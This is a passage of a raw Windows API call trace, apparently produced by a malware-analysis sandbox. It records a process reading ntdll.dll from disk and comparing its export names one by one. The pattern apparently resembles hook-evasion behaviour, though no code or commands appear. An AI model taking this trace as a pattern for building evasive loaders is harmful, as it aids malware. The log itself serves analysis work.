lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0082.376] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0082.396] GetProcessHeap () returned 0x440000 [0082.396] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4033040 | out: hHeap=0x440000) returned 1 [0082.511] GetProcessHeap () returned 0x440000 [0082.511] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x4590c0 [0082.511] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0082.511] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0082.511] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0082.511] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0082.511] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0082.512] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0082.512] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0082.512] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0082.512] GetProcessHeap () returned 0x440000 [0082.512] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1bba48) returned 0x403d040 [0082.518] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0082.518] ReadFile (in: hFile=0x140, lpBuffer=0x403d040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x403d040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0082.719] CloseHandle (hObject=0x140) returned 1 [0082.719] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0082.719] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0082.719] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0082.719] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0082.719] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0082.719] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0082.719] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0082.719] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0082.719] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0082.719] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0082.719] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0082.719] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0082.720] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0082.720] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.720] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0082.720] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.720] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0082.721] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0082.721] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0082.721] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0082.721] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0082.722] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0082.722] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0082.722] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0082.722] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0082.723] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0082.724] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0082.724] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0082.724] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0082.724] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0082.724] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.724] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0082.725] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0082.726] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0082.726] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0082.726] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0082.726] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0082.726] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0082.726] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0082.726] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0082.726] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0082.726] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0082.727] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0082.727] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0082.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") 